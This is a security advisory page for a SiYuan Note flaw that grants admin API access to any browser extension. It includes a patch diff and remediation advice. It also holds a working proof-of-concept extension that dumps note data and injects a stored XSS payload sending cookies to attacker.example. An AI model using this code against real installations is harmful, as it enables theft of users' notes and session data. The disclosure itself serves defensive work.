CVE-2026-54069Critical▾ MidnightSiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist
▾ Midnight zone — Critical, or high with PoC / in-the-wild
impact 52.3 · likelihood 0.1 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
SiYuan Note's kernel HTTP server unconditionally trusts all chrome-extension:// origins, granting RoleAdministrator access to every installed browser extension without any authentication. Combined with the default empty AccessAuthCode on desktop installs, any Chrome/Chromium extension -- including a compromised legitimate extension via supply chain attack -- can make fully authenticated admin API calls to the SiYuan kernel at 127.0.0.1:6806, enabling data exfiltration, stored XSS injection, and configuration tampering.
SiYuan <= v3.6.5 (commit 96dfe0bea474). The chrome-extension allowlist remains unfixed as of the latest commit on the fix branch (d7b77d945e0d).
In kernel/model/session.go:277, the CheckAuth middleware exempts all chrome-extension:// origins from authentication:
if strings.HasPrefix(origin, "chrome-extension://") {
// skip auth
}
At session.go:284, the request is assigned RoleAdministrator:
c.Set("role", model.RoleAdministrator)
The AccessAuthCode field defaults to an empty string for desktop installs (ContainerStd). When empty, no token validation occurs. This means any Chrome/Chromium extension can make fully authenticated admin API calls to the SiYuan kernel.
The origin check trusts the entire chrome-extension:// scheme rather than validating a specific extension ID, so every installed extension (including those with no explicit host_permissions) can access all admin endpoints.
Unauthenticated admin API access via browser extension:
A minimal Chrome extension with only default permissions:
{
"manifest_version": 3,
"name": "SiYuan PoC",
"version": "1.0",
"background": {
"service_worker": "bg.js"
}
}
// bg.js -- runs as chrome-extension://<id>
// No special host_permissions needed; localhost is accessible by default
// 1. Verify admin access
fetch('http://127.0.0.1:6806/api/system/getConf', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '{}'
}).then(r => r.json()).then(data => {
console.log('[PoC] Admin API access confirmed:', data.code === 0);
});
// 2. Exfiltrate workspace data
fetch('http://127.0.0.1:6806/api/query/sql', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ stmt: 'SELECT * FROM blocks LIMIT 100' })
}).then(r => r.json()).then(data => {
console.log('[PoC] Exfiltrated blocks:', data.data?.length);
});
// 3. Inject stored XSS payload into a note
fetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ notebook: '', path: '/' })
}).then(r => r.json()).then(tree => {
const firstDoc = tree.data?.files?.[0];
if (!firstDoc) return;
fetch('http://127.0.0.1:6806/api/block/insertBlock', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
dataType: 'markdown',
data: '<img src=x onerror="fetch(\'https://attacker.example/steal?data=\'+document.cookie)">',
parentID: firstDoc.id
})
});
});
The extension requires zero special permissions. The chrome-extension:// origin header is automatically sent by the browser, and session.go:277 grants it RoleAdministrator without any token check.
/api/query/sql, /api/filetree/, /api/export//api/block/insertBlock, /api/attr/setBlockAttrs), persisted in the user's notes/api/system/setConf, enabling persistence and further attack surface expansionRemove blanket chrome-extension:// allowlist:
--- a/kernel/model/session.go
+++ b/kernel/model/session.go
@@ -274,9 +274,6 @@
func CheckAuth(c *gin.Context) {
origin := c.GetHeader("Origin")
- if strings.HasPrefix(origin, "chrome-extension://") {
- // Allow chrome extension requests
- } else
if !isValidOrigin(origin) {
c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"})
return
If extension access is required, implement a per-session token exchange: the SiYuan UI generates a random token on startup, and the extension must present it via a dedicated pairing endpoint. This ensures only explicitly authorized extensions can access the API.
github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4Upgrade to a patched release:
github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4Connected by shared product, vendor, weakness, or advisory.
CVE-2026-50551Critical· 9.9SiYuan: Stored XSS to RCE via Unsanitized Attribute View Asset Cell Content
CVE-2026-54066High· 7.5SiYuan: Path Traversal via Double URL Encoding in /assets/*path (publish mode arbitrary file─read), Incomplete fix of CVE-2026-41894
CVE-2026-54067Critical· 9.9SiYuan: Stored XSS to RCE via CSS-snippet <style> breakout in renderSnippet()
CVE-2026-54068Medium· 5.9SiYuan: Unauthenticated SQLite Data Exfiltration via Template Injection in /api/icon/getDynamicIcon
CVE-2026-54070High· 7.1SiYuan: Stored XSS in Bazaar marketplace via package README event handlers
CVE-2026-54158Critical· 9.9SiYuan: Stored XSS to RCE via attribute-view cell rendering in genAVValueHTML()